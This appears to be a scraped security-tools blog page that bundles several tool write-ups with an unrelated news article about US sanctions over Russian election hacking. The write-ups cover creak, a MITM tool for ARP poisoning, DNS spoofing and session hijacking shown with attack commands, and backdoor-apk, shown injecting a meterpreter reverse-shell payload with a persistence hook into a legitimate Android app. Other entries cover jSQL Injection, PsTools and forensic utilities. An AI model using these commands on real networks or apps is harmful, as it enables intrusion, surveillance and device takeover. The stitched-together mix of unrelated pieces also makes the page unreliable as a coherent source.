Poison, Reset, Spoof, Redirect MITM Script - creak

Performs some of the most famous MITM attack on target addresses located in a local network. Among these, deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language, I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation

$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install

or simply clone the repository and run the creak.py after all requirements are installed:

$ git clone https://github.com/codepr/creak.git

It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options

Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150), can be specified multiple times
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example
Most basic usage: Deny all traffic to the target host

$ python creak.py -t 192.168.1.30 wlan0

Set a different gateway:

$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0

Set a different mac address for the device:

$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0

Spoof mac address generating a fake one:

$ python creak.py -x -t 192.168.1.30 wlan0

Spoof mac address generating one based on manufacturer(e.g Xeros):

$ python creak.py -x -M xeros -t 192.168.1.30 wlan0

DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost):

$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0

Deny multiple hosts in the subnet:

$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0

Download creak

Read More

Obama expels 35 Russian diplomats in retaliation for US election hacking

The Obama administration on Thursday announced its retaliation for Russian efforts to interfere with the US presidential election, ordering sweeping new sanctions that included the expulsion of 35 Russians.
Syria ceasefire appears to hold after rivals sign Russia-backed deal
Read more

US intelligence services believe Russia ordered cyber-attacks on the Democratic National Committee (DNC), Hillary Clinton’s campaign and other political organizations, in an attempt to influence the election in favor of the Republican candidate, Donald Trump.

In a statement issued two weeks after the president said he would respond to cyber-attacks by Moscow “at a time and place of our choosing”, Obama said Americans should “be alarmed by Russia’s actions” and pledged further action. 

“I have issued an executive order that provides additional authority for responding to certain cyber activity that seeks to interfere with or undermine our election processes and institutions, or those of our allies or partners,” Obama said in the statement, released while he was vacationing with his family in Hawaii.

“Using this new authority, I have sanctioned nine entities and individuals: the GRU and the FSB, two Russian intelligence services; four individual officers of the GRU; and three companies that provided material support to the GRU’s cyber operations.

“In addition, the secretary of the treasury is designating two Russian individuals for using cyber-enabled means to cause misappropriation of funds and personal identifying information.” He also announced the closure of two Russian compounds in the US.

Obama added that more actions would be taken, “some of which will not be publicized”.

On Thursday, Trump, who has previously dismissed reports of Russian interference in the election, said in a statement: “It’s time for our country to move on to bigger and better things.”
Advertisement

He added, however, that “in the interest of our country and its great people, I will meet with leaders of the intelligence community next week in order to be updated on the facts of this situation.”

In a conference call with reporters, senior White House officials said the president-elect’s transition team was informed of the sanctions before they were announced on Thursday. Trump and Obama spoke on Wednesday, they said.

The officials added that the actions were a necessary response to “very disturbing Russian threats to US national security”.

“There has to be a cost and a consequence for what Russia has done,” a senior administration official said. “It is in a extraordinary step for them to interfere in the democratic process here in the United States of America. There needs to be a price for that.”

In Moscow, a Putin spokesman said Russia regretted the new sanctions and would consider retaliatory measures.

Diplomatic expulsions are normally met with exactly reciprocal action. In this case, however, Moscow may pause for thought. With Trump, who has spoken positively about Russia and Vladimir Putin, just three weeks away from the White House, Russia may feel it is inadvisable to kick out 35 US diplomats.

However, Russian authorities on Thursday ordered the Anglo-American School of Moscow closed, according to CNN, citing a US official briefed on the matter. The school serves children of US, British and Canadian embassy personnel, and would effectively make a Russian posting difficult for US diplomats with families.

Konstantin Kosachyov, chairman of the international affairs committee in the upper house of the Russian parliament, was quoted by the RIA news agency as saying the US move represented “the death throes of political corpses”.

The Twitter feed of the Russian embassy in London, meanwhile, called the Obama administration “hapless” and attached a picture of a duck with the word “LAME” emblazoned across it.

On the White House call, officials were asked about the prospect of Trump overturning the sanctions. They acknowledged that a future president could reverse course but warned against such an “inadvisable” step.

“We have no reason to believe that Russia’s activities will cease,” a senior official said. “One reason why I think it is necessary to sustain these actions is because there’s every reason to believe Russia will interfere with future US elections.”

On Capitol Hill, Democrats applauded the president’s action, called for further measures and emphasized bipartisan support for a thorough investigation into Russian hacking.

“I hope the incoming Trump administration, which has been far too close to Russia throughout the campaign and transition, won’t think for one second about weakening these new sanctions or our existing regime,” incoming Senate minority leader Chuck Schumer said in a statement.

“Both parties ought to be united in standing up to Russian interference in our elections, to their cyber attacks, their illegal annexation of Crimea and other extra-legal interventions.”

Ben Cardin, the top Democrat on the Senate foreign relations committee, called for further sanctions from the new Congress when it convenes in January.

GOP leaders were quick to frame the new sanctions as too little, too late.

“While today’s action by the administration is overdue,” House speaker Paul Ryan said in a statement, “it is an appropriate way to end eight years of failed policy with Russia. And it serves as a prime example of this administration’s ineffective foreign policy that has left America weaker in the eyes of the world.”

Republican senators John McCain and Lindsey Graham, two of Russia’s fiercest critics, echoed Ryan but also called for tough Congressional sanctions.

“Ultimately, [the sanctions] are a small price for Russia to pay for its brazen attack on American democracy,” the two men said in a joint statement. “We intend to lead the effort in the new Congress to impose stronger sanctions on Russia.”

 The 35 Russian diplomats being expelled are “intelligence operatives”, Obama said. The state department has declared them “persona non grata” and they will be given 72 hours to leave the country.

Starting on Friday at noon, the White House said, Russia will be denied access to compounds in Maryland and New York that have been used for intelligence-related purposes.

A statement from the state department said the diplomatic expulsions were a response not only to hacking but to “a pattern of harassment of our diplomats overseas, that has increased over the last four years, including a significant increase in the last 12 months”.

The statement said the harassment has included “arbitrary police stops, physical assault, and the broadcast on state TV of personal details about our personnel that put them at risk”.

For some time, US diplomats in Russia have anecdotally reported being followed and harassed by police.

In June, a US diplomat was wrestled to the ground by a policeman as he scrambled to get inside the embassy. Russian authorities said the man was a CIA agent operating under diplomatic cover.

Source: theguardian

Read More

Java application for automatic SQL database injection - jSQL Injection v0.77

jSQL Injection is a lightweight application used to find database information from a distant server.

It's is free , open source and cross-platform (Windows, Linux, Mac OS X).

jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in distributions like Pentest Box , Parrot Security OS , ArchStrike and BlackArch Linux.

Installation
Install Java , then download the latest release of jSQL and double-click on the .jar to launch the software.
You can also type java -jar jsql-injection-v0.77.jar in your terminal to start the program.

Screenshots

Roadmap

WAF tamper, HTTP Auth Bruteforce, Translation, SOAP injection, Command line interface, Databases: Access Cassandra MongoDb and Neo4j

Change log

v0.76 Czech translation, 17 Database flavors: SQLite
v0.75 URI injection point, Mavenify, Upgrade to Java 7, Optimized UI
v0.73 Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection
v0.7 Scan multiple URLs, Github Issue reporter, 16 Database flavors: Cubrid Derby H2 HSQLDB MariaDB and Teradata, Optimized UI
alpha-v0.6 Speed x2: No hex encoding, 10 Database flavors: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, Translation
0.5 SQL Shell, Uploader
0.4 Admin page, Hash bruteforce like MD5 and MySQL, Text encoder/decoder like Base64, Hex and MD5
0.3 File injection, Web Shell, Integrated terminal, Configuration backup, Update checker
0.2 Algorithm Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls
0.0-0.1 Method GET POST Header and Cookie, Algorithm Normal Error and Blind, Best algorithm selection, Progression bars, Simple evasion, Proxy settings, MySQL only

jSQL Injection

Read More

Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more - PsTools

The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.

Introduction 

 The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that help you administer your Windows NT/2K systems. Over time, I've grown a collection of similar tools, including some not included in the Resource Kits. What sets these tools apart is that they all allow you to manage remote systems as well as the local one. The first tool in the suite was PsList, a tool that lets you view detailed information about processes, and the suite is continually growing. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so I've adopted this prefix for all the tools in order to tie them together into a suite of tools named PsTools.

Note: some anti-virus scanners report that one or more of the tools are infected with a "remote admin" virus. None of the PsTools contain viruses, but they have been used by viruses, which is why they trigger virus notifications.

The tools included in the PsTools suite, which are downloadable as a package, are:

• PsExec - execute processes remotely
• PsFile - shows files opened remotely
• PsGetSid - display the SID of a computer or a user
• PsInfo - list information about a system
• PsPing - measure network performance
• PsKill - kill processes by name or process ID
• PsList - list detailed information about processes
• PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
• PsLogList - dump event log records
• PsPasswd - changes account passwords
• PsService - view and control services
• PsShutdown - shuts down and optionally reboots a computer
• PsSuspend - suspends processes
• PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)

The PsTools download package includes an HTML help file with complete usage information for all the tools.

Download PsTools

Read More

A Tool For Forensic File System Reconstruction - RecuperaBit

A software which attempts to reconstruct file system structures and recover files. Currently it supports only NTFS.

RecuperaBit attempts reconstruction of the directory structure regardless of:

• missing partition table
• unknown partition boundaries
• partially-overwritten metadata
• quick format

You can get more information about the reconstruction algorithms and the architecture used in RecuperaBit by reading my MSc thesis or checking out the slides.

Usage

usage: main.py [-h] [-s SAVEFILE] [-w] [-o OUTPUTDIR] path

Reconstruct the directory structure of possibly damaged filesystems.

positional arguments:
  path                  path to the disk image

optional arguments:
  -h, --help            show this help message and exit
  -s SAVEFILE, --savefile SAVEFILE
                        path of the scan save file
  -w, --overwrite       force overwrite of the save file
  -o OUTPUTDIR, --outputdir OUTPUTDIR
                        directory for restored contents and output files

The main argument is the path to a bitstream image of a disk or partition. RecuperaBit automatically determines the sectors from which partitions start.

RecuperaBit does not modify the disk image, however it does read some parts of it multiple times through the execution. It should also work on real devices, such as /dev/sda but this is not advised.
Optionally, a save file can be specified with -s . The first time, after the scanning process, results are saved in the file. After the first run, the file is read to only analyze interesting sectors and speed up the loading phase.

Overwriting the save file can be forced with -w .

RecuperaBit includes a small command line that allows the user to recover files and export the contents of a partition in CSV or body file format. These are exported in the directory specified by -o (or recuperabit_output ).

Pypy
RecuperaBit can be run with the standard cPython implementation, however speed can be increased by using it with the Pypy interpreter and JIT compiler:

pypy main.py /path/to/disk.img

Recovery of File Contents
Files can be restored one at a time or recursively, starting from a directory. After the scanning process has completed, you can check the list of partitions that can be recovered by issuing the following command at the prompt:

recoverable

Each line shows information about a partition. Let's consider the following output example:

Partition #0 -> Partition (NTFS, 15.00 MB, 11 files, Recoverable, Offset: 2048, Offset (b): 1048576, Sec/Clus: 8, MFT offset: 2080, MFT mirror offset: 17400)

If you want to recover files starting from a specific directory, you can either print the tree on screen with the tree command (very verbose for large drives) or you can export a CSV list of files (see help for details).

If you rather want to extract all files from the Root and the Lost Files nodes, you need to know the identifier for the root directory, depending on the file system type. The following are those of file systems supported by RecuperaBit:

File System Type	Root Id
NTFS	5

The id for Lost Files is -1 for every file system.

Therefore, to restore Partition #0 in our example, you need to run:

restore 0 5
restore 0 -1

The files will be saved inside the output directory specified by -o .

Download RecuperaBit

Read More

shell script that simplifies the process of adding a backdoor to any Android APK file - backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc

Download backdoor-apk

Read More

Linux Command Line - Cheat Sheet

By OffSec

Read More

Cyber Security GeoIP Attack Map Visualization - geoip-attack-map

This geoip attack map visualizer was developed to display network attacks on your organization in real time. The data server follows a syslog file, and parses out source IP, destination IP, source port, and destination port. Protocols are determined via common ports, and the visualizations vary in color based on protocol type. CLICK HERE for a demo video. This project would not be possible if it weren't for Sam Cappella, who created a cyber defense competition network traffic visualizer for the 2015 Palmetto Cyber Defense Competition. I mainly used his code as a reference, but I did borrow a few functions while creating the display server, and visual aspects of the webapp. I would also like to give special thanks to Dylan Madisetti as well for giving me advice about certain aspects of my implementation.

Important

This program relies entirely on syslog, and because all appliances format logs differently, you will need to customize the log parsing function(s). If your organization uses a security information and event management system (SIEM), it can probably normalize logs to save you a ton of time writing regex. 1. Send all syslog to SIEM. 2. Use SIEM to normalize logs. 3. Send normalized logs to the box (any Linux machine running syslog-ng will work) running this software so the data server can parse them.

Installation
Run the following commands to install all required dependencies (tested on Ubuntu 14.04 x64)

# sudo apt-get install python3-pip redis-server
# sudo pip3 install tornado tornado-redis redis maxminddb

Setup

1. Make sure in /etc/redis/redis.conf to change bind 127.0.0.1 to bind 0.0.0.0 if you plan on running the DataServer on a different machine than the AttackMapServer.
2. Make sure that the WebSocket address in /AttackMapServer/index.html points back to the IP address of the AttackMapServer so the browser knows the address of the WebSocket.
3. Download the MaxMind GeoLite2 database, and change the db_path variable in DataServer.py to the wherever you store the database.
   • ./db-dl.sh
4. Add headquarters latitude/longitude to hqLatLng variable in index.html
5. Use syslog-gen.sh to simulate dummy traffic "out of the box."
6. IMPORTANT: Remember, this code will only run correctly in a production environment after personalizing the parsing functions. The default parsing function is only written to parse ./syslog-gen.sh traffic.

Download geoip-attack-map

Read More

Trace URL's jumps across the rel links to obtain the last URL - Hoper

It shows all the hops that makes a url you specify to reach its endpoint. For example if you want to see the entire trip by email URL or like a URL shorten. Hoper returns you all URLs redirections.

Installation

$ gem install hoper

Usage
Type in your command line:

$ hoper [url]

Development
After checking out the repo, run bin/setup to install dependencies. You can also run bin/console for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run bundle exec rake install . To release a new version, update the version number in version.rb , and then run bundle exec rake release , which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org .

Download Hoper

Read More